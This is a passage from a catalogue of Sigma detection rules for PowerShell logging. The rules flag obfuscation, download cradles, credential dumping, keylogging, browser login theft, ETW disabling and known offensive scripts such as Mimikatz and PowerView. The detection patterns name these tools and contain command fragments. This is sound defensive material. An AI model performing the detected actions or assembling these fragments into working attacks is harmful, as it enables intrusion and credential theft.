condition: selection
selection:
ContextInfo|contains: Get-NetTCPConnection
Invoke-Obfuscation Via Use MSHTA - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use MSHTA in Scripts
Detection logic
condition: selection
selection:
Payload|contains|all:
- set
- '&&'
- mshta
- vbscript:createobject
- .run
- (window.close)
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module
- source: sigma
- technicques:
- t1218
Description
Detects PowerShell module creation where the module Contents are set to “function Get-VMRemoteFXPhysicalVideoAdapter”. This could be a sign of potential abuse of the “RemoteFXvGPUDisablement.exe” binary which is known to be vulnerable to module load-order hijacking.
Detection logic
condition: selection
selection:
Payload|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter {
Zip A Folder With PowerShell For Staging In Temp - PowerShell Module
- source: sigma
- technicques:
- t1074
- t1074.001
Description
Detects PowerShell scripts that make use of the “Compress-Archive” Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Detection logic
condition: selection
selection:
ContextInfo|contains|all:
- Compress-Archive -Path*-DestinationPath $env:TEMP
- Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\
- Compress-Archive -Path*-DestinationPath*:\Windows\Temp\
Malicious PowerShell Scripts - PoshModule
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance
Detection logic
condition: 1 of selection_*
selection_generic:
ContextInfo|contains:
- Add-ConstrainedDelegationBackdoor.ps1
- Add-Exfiltration.ps1
- Add-Persistence.ps1
- Add-RegBackdoor.ps1
- Add-RemoteRegBackdoor.ps1
- Add-ScrnSaveBackdoor.ps1
- Check-VM.ps1
- ConvertTo-ROT13.ps1
- Copy-VSS.ps1
- Create-MultipleSessions.ps1
- DNS_TXT_Pwnage.ps1
- dnscat2.ps1
- Do-Exfiltration.ps1
- DomainPasswordSpray.ps1
- Download_Execute.ps1
- Download-Execute-PS.ps1
- Enabled-DuplicateToken.ps1
- Enable-DuplicateToken.ps1
- Execute-Command-MSSQL.ps1
- Execute-DNSTXT-Code.ps1
- Execute-OnTime.ps1
- ExetoText.ps1
- Exploit-Jboss.ps1
- Find-AVSignature.ps1
- Find-Fruit.ps1
- Find-GPOLocation.ps1
- Find-TrustedDocuments.ps1
- FireBuster.ps1
- FireListener.ps1
- Get-ApplicationHost.ps1
- Get-ChromeDump.ps1
- Get-ClipboardContents.ps1
- Get-ComputerDetail.ps1
- Get-FoxDump.ps1
- Get-GPPAutologon.ps1
- Get-GPPPassword.ps1
- Get-IndexedItem.ps1
- Get-Keystrokes.ps1
- Get-LSASecret.ps1
- Get-MicrophoneAudio.ps1
- Get-PassHashes.ps1
- Get-PassHints.ps1
- Get-RegAlwaysInstallElevated.ps1
- Get-RegAutoLogon.ps1
- Get-RickAstley.ps1
- Get-Screenshot.ps1
- Get-SecurityPackages.ps1
- Get-ServiceFilePermission.ps1
- Get-ServicePermission.ps1
- Get-ServiceUnquoted.ps1
- Get-SiteListPassword.ps1
- Get-System.ps1
- Get-TimedScreenshot.ps1
- Get-UnattendedInstallFile.ps1
- Get-Unconstrained.ps1
- Get-USBKeystrokes.ps1
- Get-VaultCredential.ps1
- Get-VulnAutoRun.ps1
- Get-VulnSchTask.ps1
- Get-WebConfig.ps1
- Get-WebCredentials.ps1
- Get-WLAN-Keys.ps1
- Gupt-Backdoor.ps1
- HTTP-Backdoor.ps1
- HTTP-Login.ps1
- Install-ServiceBinary.ps1
- Install-SSP.ps1
- Invoke-ACLScanner.ps1
- Invoke-ADSBackdoor.ps1
- Invoke-AmsiBypass.ps1
- Invoke-ARPScan.ps1
- Invoke-BackdoorLNK.ps1
- Invoke-BadPotato.ps1
- Invoke-BetterSafetyKatz.ps1
- Invoke-BruteForce.ps1
- Invoke-BypassUAC.ps1
- Invoke-Carbuncle.ps1
- Invoke-Certify.ps1
- Invoke-ConPtyShell.ps1
- Invoke-CredentialInjection.ps1
- Invoke-CredentialsPhish.ps1
- Invoke-DAFT.ps1
- Invoke-DCSync.ps1
- Invoke-Decode.ps1
- Invoke-DinvokeKatz.ps1
- Invoke-DllInjection.ps1
- Invoke-DowngradeAccount.ps1
- Invoke-EgressCheck.ps1
- Invoke-Encode.ps1
- Invoke-EventViewer.ps1
- Invoke-Eyewitness.ps1
- Invoke-FakeLogonScreen.ps1
- Invoke-Farmer.ps1
- Invoke-Get-RBCD-Threaded.ps1
- Invoke-Gopher.ps1
- Invoke-Grouper2.ps1
- Invoke-Grouper3.ps1
- Invoke-HandleKatz.ps1
- Invoke-Interceptor.ps1
- Invoke-Internalmonologue.ps1
- Invoke-Inveigh.ps1
- Invoke-InveighRelay.ps1
- Invoke-JSRatRegsvr.ps1
- Invoke-JSRatRundll.ps1
- Invoke-KrbRelay.ps1
- Invoke-KrbRelayUp.ps1
- Invoke-LdapSignCheck.ps1
- Invoke-Lockless.ps1
- Invoke-MalSCCM.ps1
- Invoke-Mimikatz.ps1
- Invoke-MimikatzWDigestDowngrade.ps1
- Invoke-Mimikittenz.ps1
- Invoke-MITM6.ps1
- Invoke-NanoDump.ps1
- Invoke-NetRipper.ps1
- Invoke-NetworkRelay.ps1
- Invoke-NinjaCopy.ps1
- Invoke-OxidResolver.ps1
- Invoke-P0wnedshell.ps1
- Invoke-P0wnedshellx86.ps1
- Invoke-Paranoia.ps1
- Invoke-PortScan.ps1
- Invoke-PoshRatHttp.ps1
- Invoke-PoshRatHttps.ps1
- Invoke-PostExfil.ps1
- Invoke-PowerDump.ps1
- Invoke-PowerShellIcmp.ps1
- Invoke-PowerShellTCP.ps1
- Invoke-PowerShellTcpOneLine.ps1
- Invoke-PowerShellTcpOneLineBind.ps1
- Invoke-PowerShellUdp.ps1
- Invoke-PowerShellUdpOneLine.ps1
- Invoke-PowerShellWMI.ps1
- Invoke-PowerThIEf.ps1
- Invoke-PPLDump.ps1
- Invoke-Prasadhak.ps1
- Invoke-PsExec.ps1
- Invoke-PsGcat.ps1
- Invoke-PsGcatAgent.ps1
- Invoke-PSInject.ps1
- Invoke-PsUaCme.ps1
- Invoke-ReflectivePEInjection.ps1
- Invoke-ReverseDNSLookup.ps1
- Invoke-Rubeus.ps1
- Invoke-RunAs.ps1
- Invoke-SafetyKatz.ps1
- Invoke-SauronEye.ps1
- Invoke-SCShell.ps1
- Invoke-Seatbelt.ps1
- Invoke-ServiceAbuse.ps1
- Invoke-SessionGopher.ps1
- Invoke-ShellCode.ps1
- Invoke-SMBScanner.ps1
- Invoke-Snaffler.ps1
- Invoke-Spoolsample.ps1
- Invoke-SSHCommand.ps1
- Invoke-SSIDExfil.ps1
- Invoke-StandIn.ps1
- Invoke-StickyNotesExtract.ps1
- Invoke-Tater.ps1
- Invoke-Thunderfox.ps1
- Invoke-ThunderStruck.ps1
- Invoke-TokenManipulation.ps1
- Invoke-Tokenvator.ps1
- Invoke-TotalExec.ps1
- Invoke-UrbanBishop.ps1
- Invoke-UserHunter.ps1
- Invoke-VoiceTroll.ps1
- Invoke-Whisker.ps1
- Invoke-WinEnum.ps1
- Invoke-winPEAS.ps1
- Invoke-WireTap.ps1
- Invoke-WmiCommand.ps1
- Invoke-WScriptBypassUAC.ps1
- Invoke-Zerologon.ps1
- Keylogger.ps1
- MailRaider.ps1
- New-HoneyHash.ps1
- OfficeMemScraper.ps1
- Offline_Winpwn.ps1
- Out-CHM.ps1
- Out-DnsTxt.ps1
- Out-Excel.ps1
- Out-HTA.ps1
- Out-Java.ps1
- Out-JS.ps1
- Out-Minidump.ps1
- Out-RundllCommand.ps1
- Out-SCF.ps1
- Out-SCT.ps1
- Out-Shortcut.ps1
- Out-WebQuery.ps1
- Out-Word.ps1
- Parse_Keys.ps1
- Port-Scan.ps1
- PowerBreach.ps1
- powercat.ps1
- PowerRunAsSystem.psm1
- PowerSharpPack.ps1
- PowerUp.ps1
- PowerUpSQL.ps1
- PowerView.ps1
- PSAsyncShell.ps1
- RemoteHashRetrieval.ps1
- Remove-Persistence.ps1
- Remove-PoshRat.ps1
- Remove-Update.ps1
- Run-EXEonRemote.ps1
- Schtasks-Backdoor.ps1
- Set-DCShadowPermissions.ps1
- Set-MacAttribute.ps1
- Set-RemotePSRemoting.ps1
- Set-RemoteWMI.ps1
- Set-Wallpaper.ps1
- Show-TargetScreen.ps1
- Speak.ps1
- Start-CaptureServer.ps1
- Start-WebcamRecorder.ps1
- StringToBase64.ps1
- TexttoExe.ps1
- VolumeShadowCopyTools.ps1
- WinPwn.ps1
- WSUSpendu.ps1
selection_invoke_sharp:
ContextInfo|contains|all:
- Invoke-Sharp
- .ps1
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detection logic
condition: selection_4103
selection_4103:
Payload|re: (?i)&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c
Suspicious PowerShell Invocations - Specific - PowerShell Module
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects suspicious PowerShell invocation command parameters
Detection logic
condition: 1 of selection_* and not 1 of filter_*
filter_chocolatey:
ContextInfo|contains:
- (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1
- Write-ChocolateyWarning
selection_convert_b64:
ContextInfo|contains|all:
- -nop
- ' -w '
- hidden
- ' -c '
- '[Convert]::FromBase64String'
selection_enc:
ContextInfo|contains|all:
- ' -w '
- hidden
- -ep
- bypass
- -Enc
selection_iex:
ContextInfo|contains|all:
- ' -w '
- hidden
- -noni
- -nop
- ' -c '
- iex
- New-Object
selection_iex_webclient:
ContextInfo|contains|all:
- iex
- New-Object
- Net.WebClient
- .Download
selection_reg:
ContextInfo|contains|all:
- powershell
- reg
- add
- HKCU\software\microsoft\windows\currentversion\run
selection_webclient:
ContextInfo|contains|all:
- bypass
- -noprofile
- -windowstyle
- hidden
- new-object
- system.net.webclient
- .download
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
Detection logic
condition: selection_payload
selection_payload:
- Payload|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
- Payload|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
- Payload|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
- Payload|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
- Payload|re: \*mdr\*\W\s*\)\.Name
- Payload|re: \$VerbosePreference\.ToString\(
- Payload|re: \[String\]\s*\$VerbosePreference
Suspicious Get-ADDBAccount Usage
- source: sigma
- technicques:
- t1003
- t1003.003
Description
Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers
Detection logic
condition: selection
selection:
Payload|contains|all:
- Get-ADDBAccount
- 'BootKey '
- 'DatabasePath '
PowerShell Get Clipboard
- source: sigma
- technicques:
- t1115
Description
A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
Detection logic
condition: selection
selection:
Payload|contains: Get-Clipboard
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detection logic
condition: selection_4103
selection_4103:
Payload|contains|all:
- rundll32.exe
- shell32.dll
- shellexec_rundll
- powershell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detection logic
condition: selection_4103
selection_4103:
Payload|contains:
- system.io.compression.deflatestream
- system.io.streamreader
Payload|contains|all:
- new-object
- text.encoding]::ascii
Payload|endswith: readtoend
Invoke-Obfuscation Via Stdin - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via Stdin in Scripts
Detection logic
condition: selection_4103
selection_4103:
Payload|re: (?i)(set).*&&\s?set.*(environment|invoke|\$?\{?input).*&&.*"
PowerShell Decompress Commands
- source: sigma
- technicques:
- t1140
Description
A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.
Detection logic
condition: selection_4103
selection_4103:
Payload|contains: Expand-Archive
Invoke-Obfuscation STDIN+ Launcher - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of stdin to execute PowerShell
Detection logic
condition: selection_4103
selection_4103:
Payload|re: cmd.{0,5}(?:/c|/r).+powershell.+(?:\$\{?input\}?|noexit).+"
Invoke-Obfuscation Via Use Rundll32 - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detection logic
condition: selection_4103
selection_4103:
Payload|contains:
- value
- invoke
- comspec
- iex
Payload|contains|all:
- '&&'
- rundll32
- shell32.dll
- shellexec_rundll
Invoke-Obfuscation VAR+ Launcher - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Environment Variables to execute PowerShell
Detection logic
condition: selection_4103
selection_4103:
Payload|re: cmd.{0,5}(?:/c|/r)(?:\s|)"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\"\s+?-f(?:.*\)){1,}.*"
Invoke-Obfuscation CLIP+ Launcher - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Clip.exe to execute PowerShell
Detection logic
condition: selection_4103
selection_4103:
Payload|re: cmd.{0,5}(?:/c|/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\"\{\d\}.+-f.+"
Malicious PowerShell Commandlets - PoshModule
- source: sigma
- technicques:
- t1059
- t1059.001
- t1069
- t1069.001
- t1069.002
- t1087
- t1087.001
- t1087.002
- t1482
Description
Detects Commandlet names from well-known PowerShell exploitation frameworks
Detection logic
condition: selection
selection:
Payload|contains:
- Add-Exfiltration
- Add-Persistence
- Add-RegBackdoor
- Add-RemoteRegBackdoor
- Add-ScrnSaveBackdoor
- Check-VM
- ConvertTo-Rc4ByteStream
- Decrypt-Hash
- Disable-ADIDNSNode
- Disable-MachineAccount
- Do-Exfiltration
- Enable-ADIDNSNode
- Enable-MachineAccount
- Enabled-DuplicateToken
- Exploit-Jboss
- Export-ADR
- Export-ADRCSV
- Export-ADRExcel
- Export-ADRHTML
- Export-ADRJSON
- Export-ADRXML
- Find-Fruit
- Find-GPOLocation
- Find-TrustedDocuments
- Get-ADIDNS
- Get-ApplicationHost
- Get-ChromeDump
- Get-ClipboardContents
- Get-FoxDump
- Get-GPPPassword
- Get-IndexedItem
- Get-KerberosAESKey
- Get-Keystrokes
- Get-LSASecret
- Get-MachineAccountAttribute
- Get-MachineAccountCreator
- Get-PassHashes
- Get-RegAlwaysInstallElevated
- Get-RegAutoLogon
- Get-RemoteBootKey
- Get-RemoteCachedCredential
- Get-RemoteLocalAccountHash
- Get-RemoteLSAKey
- Get-RemoteMachineAccountHash
- Get-RemoteNLKMKey
- Get-RickAstley
- Get-Screenshot
- Get-SecurityPackages
- Get-ServiceFilePermission
- Get-ServicePermission
- Get-ServiceUnquoted
- Get-SiteListPassword
- Get-System
- Get-TimedScreenshot
- Get-UnattendedInstallFile
- Get-Unconstrained
- Get-USBKeystrokes
- Get-VaultCredential
- Get-VulnAutoRun
- Get-VulnSchTask
- Grant-ADIDNSPermission
- Gupt-Backdoor
- HTTP-Login
- Install-ServiceBinary
- Install-SSP
- Invoke-ACLScanner
- Invoke-ADRecon
- Invoke-ADSBackdoor
- Invoke-AgentSmith
- Invoke-AllChecks
- Invoke-ARPScan
- Invoke-AzureHound
- Invoke-BackdoorLNK
- Invoke-BadPotato
- Invoke-BetterSafetyKatz
- Invoke-BypassUAC
- Invoke-Carbuncle
- Invoke-Certify
- Invoke-ConPtyShell
- Invoke-CredentialInjection
- Invoke-DAFT
- Invoke-DCSync
- Invoke-DinvokeKatz
- Invoke-DllInjection
- Invoke-DNSUpdate
- Invoke-DomainPasswordSpray
- Invoke-DowngradeAccount
- Invoke-EgressCheck
- Invoke-Eyewitness
- Invoke-FakeLogonScreen
- Invoke-Farmer
- Invoke-Get-RBCD-Threaded
- Invoke-Gopher
- Invoke-Grouper
- Invoke-HandleKatz
- Invoke-ImpersonatedProcess
- Invoke-ImpersonateSystem
- Invoke-InteractiveSystemPowerShell
- Invoke-Internalmonologue
- Invoke-Inveigh
- Invoke-InveighRelay
- Invoke-KrbRelay
- Invoke-LdapSignCheck
- Invoke-Lockless
- Invoke-MalSCCM
- Invoke-Mimikatz
- Invoke-Mimikittenz
- Invoke-MITM6
- Invoke-NanoDump
- Invoke-NetRipper
- Invoke-Nightmare
- Invoke-NinjaCopy
- Invoke-OfficeScrape
- Invoke-OxidResolver
- Invoke-P0wnedshell
- Invoke-Paranoia
- Invoke-PortScan
- Invoke-PoshRatHttp
- Invoke-PostExfil
- Invoke-PowerDump
- Invoke-PowerShellTCP
- Invoke-PowerShellWMI
- Invoke-PPLDump
- Invoke-PsExec
- Invoke-PSInject
- Invoke-PsUaCme
- Invoke-ReflectivePEInjection
- Invoke-ReverseDNSLookup
- Invoke-Rubeus
- Invoke-RunAs
- Invoke-SafetyKatz
- Invoke-SauronEye
- Invoke-SCShell
- Invoke-Seatbelt
- Invoke-ServiceAbuse
- Invoke-ShadowSpray
- Invoke-Sharp
- Invoke-Shellcode
- Invoke-SMBScanner
- Invoke-Snaffler
- Invoke-Spoolsample
- Invoke-SpraySinglePassword
- Invoke-SSHCommand
- Invoke-StandIn
- Invoke-StickyNotesExtract
- Invoke-SystemCommand
- Invoke-Tasksbackdoor
- Invoke-Tater
- Invoke-Thunderfox
- Invoke-ThunderStruck
- Invoke-TokenManipulation
- Invoke-Tokenvator
- Invoke-TotalExec
- Invoke-UrbanBishop
- Invoke-UserHunter
- Invoke-VoiceTroll
- Invoke-Whisker
- Invoke-WinEnum
- Invoke-winPEAS
- Invoke-WireTap
- Invoke-WmiCommand
- Invoke-WMIExec
- Invoke-WScriptBypassUAC
- Invoke-Zerologon
- MailRaider
- New-ADIDNSNode
- New-DNSRecordArray
- New-HoneyHash
- New-InMemoryModule
- New-MachineAccount
- New-SOASerialNumberArray
- Out-Minidump
- Port-Scan
- PowerBreach
- 'powercat '
- PowerUp
- PowerView
- Remove-ADIDNSNode
- Remove-MachineAccount
- Remove-Update
- Rename-ADIDNSNode
- Revoke-ADIDNSPermission
- Set-ADIDNSNode
- Set-MacAttribute
- Set-MachineAccountAttribute
- Set-Wallpaper
- Show-TargetScreen
- Start-CaptureServer
- Start-Dnscat2
- Start-WebcamRecorder
- VolumeShadowCopyTools
Invoke-Obfuscation Via Use Clip - PowerShell Module
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detection logic
condition: selection_4103
selection_4103:
Payload|re: (?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)
Nslookup PowerShell Download Cradle
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.
Detection logic
condition: selection
selection:
Data|contains:
- -q=txt http
- -querytype=txt http
Data|contains|all:
- powershell
- nslookup
- '[1]'
Netcat The Powershell Version
- source: sigma
- technicques:
- t1095
Description
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
Detection logic
condition: selection
selection:
Data|contains:
- 'powercat '
- powercat.ps1
Use Get-NetTCPConnection
- source: sigma
- technicques:
- t1049
Description
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Detection logic
condition: selection
selection:
Data|contains: Get-NetTCPConnection
Suspicious Non PowerShell WSMAN COM Provider
- source: sigma
- technicques:
- t1021
- t1021.003
- t1059
- t1059.001
Description
Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_ps:
Data|contains:
- HostApplication=powershell
- HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell
- HostApplication=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell
- HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell
- HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell
selection:
Data|contains: ProviderName=WSMan
Zip A Folder With PowerShell For Staging In Temp - PowerShell
- source: sigma
- technicques:
- t1074
- t1074.001
Description
Detects PowerShell scripts that make use of the “Compress-Archive” Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Detection logic
condition: selection
selection:
Data|contains:
- Compress-Archive -Path*-DestinationPath $env:TEMP
- Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\
- Compress-Archive -Path*-DestinationPath*:\Windows\Temp\
Potential RemoteFXvGPUDisablement.EXE Abuse
- source: sigma
- technicques:
- t1218
Description
Detects PowerShell module creation where the module Contents are set to “function Get-VMRemoteFXPhysicalVideoAdapter”. This could be a sign of potential abuse of the “RemoteFXvGPUDisablement.exe” binary which is known to be vulnerable to module load-order hijacking.
Detection logic
condition: selection
selection:
Data|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter {
Suspicious XOR Encoded PowerShell Command Line - PowerShell
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.
Detection logic
condition: selection and filter
filter:
Data|contains:
- bxor
- char
- join
selection:
Data|contains: HostName=ConsoleHost
PowerShell Downgrade Attack - PowerShell
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
Detection logic
condition: selection and not filter_main
filter_main:
Data|contains: HostVersion=2.
selection:
Data|contains: EngineVersion=2.
PowerShell Called from an Executable Version Mismatch
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects PowerShell called from an executable by the version mismatch method
Detection logic
condition: all of selection_*
selection_engine:
Data|contains:
- EngineVersion=2.
- EngineVersion=4.
- EngineVersion=5.
selection_host:
Data|contains: HostVersion=3.
Renamed Powershell Under Powershell Channel
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects renamed powershell
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_ps:
Data|contains:
- HostApplication=powershell
- HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell
- HostApplication=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell
- HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell
- HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell
selection:
Data|contains: HostName=ConsoleHost
Potential PowerShell Obfuscation Using Character Join
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- -Alias
- ' -Value (-join('
Invoke-Obfuscation Via Use Rundll32 - PowerShell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|contains:
- value
- invoke
- comspec
- iex
ScriptBlockText|contains|all:
- '&&'
- rundll32
- shell32.dll
- shellexec_rundll
Zip A Folder With PowerShell For Staging In Temp - PowerShell Script
- source: sigma
- technicques:
- t1074
- t1074.001
Description
Detects PowerShell scripts that make use of the “Compress-Archive” Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- Compress-Archive -Path*-DestinationPath $env:TEMP
- Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\
- Compress-Archive -Path*-DestinationPath*:\Windows\Temp\
Potential Suspicious PowerShell Keywords
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- System.Reflection.Assembly.Load($
- '[System.Reflection.Assembly]::Load($'
- '[Reflection.Assembly]::Load($'
- System.Reflection.AssemblyName
- Reflection.Emit.AssemblyBuilderAccess
- Reflection.Emit.CustomAttributeBuilder
- Runtime.InteropServices.UnmanagedType
- Runtime.InteropServices.DllImportAttribute
- SuspendThread
- rundll32
Invoke-Obfuscation VAR+ Launcher - PowerShell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Environment Variables to execute PowerShell
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|re: cmd.{0,5}(?:/c|/r)(?:\s|)"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\"\s+?-f(?:.*\)){1,}.*"
Powershell Create Scheduled Task
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
Detection logic
condition: 1 of selection_*
selection_cimmethod:
ScriptBlockText|contains|all:
- Invoke-CimMethod
- -ClassName
- PS_ScheduledTask
- -NameSpace
- Root\Microsoft\Windows\TaskScheduler
selection_cmdlet:
ScriptBlockText|contains:
- New-ScheduledTaskAction
- New-ScheduledTaskTrigger
- New-ScheduledTaskPrincipal
- New-ScheduledTaskSettingsSet
- New-ScheduledTask
- Register-ScheduledTask
Powershell Keylogging
- source: sigma
- technicques:
- t1056
- t1056.001
Description
Adversaries may log user keystrokes to intercept credentials as the user types them.
Detection logic
condition: 1 of selection_*
selection_basic:
ScriptBlockText|contains: Get-Keystrokes
selection_high:
ScriptBlockText|contains|all:
- Get-ProcAddress user32.dll GetAsyncKeyState
- Get-ProcAddress user32.dll GetForegroundWindow
Powershell Store File In Alternate Data Stream
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Detection logic
condition: selection_compspec
selection_compspec:
ScriptBlockText|contains|all:
- Start-Process
- '-FilePath "$env:comspec" '
- '-ArgumentList '
- '>'
Powershell Token Obfuscation - Powershell
- source: sigma
- technicques:
- t1027
- t1027.009
Description
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
Detection logic
condition: selection and not 1 of filter_*
filter_chocolatey:
ScriptBlockText|contains:
- it will return true or false instead
- The function also prevents `Get-ItemProperty` from failing
filter_exchange:
Path|endswith: \bin\servicecontrol.ps1
Path|startswith: C:\Program Files\Microsoft\Exchange Server\
ScriptBlockText|contains: '`r`n'
selection:
- ScriptBlockText|re: \w+`(\w+|-|.)`[\w+|\s]
- ScriptBlockText|re: '"(\{\d\}){2,}"\s*-f'
- ScriptBlockText|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\}
Potential Keylogger Activity
- source: sigma
- technicques:
- t1056
- t1056.001
Description
Detects PowerShell scripts that contains reference to keystroke capturing functions
Detection logic
condition: selection
selection:
ScriptBlockText|contains: '[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'
Potential Data Exfiltration Via Audio File
- source: sigma
- technicques:
Description
Detects potential exfiltration attempt via audio file using PowerShell
Detection logic
condition: selection_main and 1 of selection_header_*
selection_header_wav:
ScriptBlockText|contains|all:
- '0x52'
- '0x49'
- '0x46'
- '0x57'
- '0x41'
- '0x56'
- '0x45'
- '0xAC'
selection_main:
ScriptBlockText|contains|all:
- '[System.Math]::'
- '[IO.FileMode]::'
- BinaryWriter
Access to Browser Login Data
- source: sigma
- technicques:
- t1555
- t1555.003
Description
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Detection logic
condition: all of selection_*
selection_cmd:
ScriptBlockText|contains|all:
- Copy-Item
- -Destination
selection_path:
ScriptBlockText|contains:
- \Opera Software\Opera Stable\Login Data
- \Mozilla\Firefox\Profiles
- \Microsoft\Edge\User Data\Default
- \Google\Chrome\User Data\Default\Login Data
- \Google\Chrome\User Data\Default\Login Data For Account
Disable of ETW Trace - Powershell
- source: sigma
- technicques:
- t1070
- t1562
- t1562.006
Description
Detects usage of powershell cmdlets to disable or remove ETW trace sessions
Detection logic
condition: 1 of selection*
selection_pwsh_remove:
ScriptBlockText|contains: 'Remove-EtwTraceProvider '
selection_pwsh_set:
ScriptBlockText|contains|all:
- 'Set-EtwTraceProvider '
- '0x11'
Active Directory Group Enumeration With Get-AdGroup
- source: sigma
- technicques:
- t1069
- t1069.002
Description
Detects usage of the “Get-AdGroup” cmdlet to enumerate Groups within Active Directory
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- 'Get-AdGroup '
- -Filter
Silence.EDA Detection
- source: sigma
- technicques:
- t1059
- t1059.001
- t1071
- t1071.004
- t1529
- t1572
Description
Detects Silence EmpireDNSAgent as described in the Group-IP report
Detection logic
condition: empire and dnscat
dnscat:
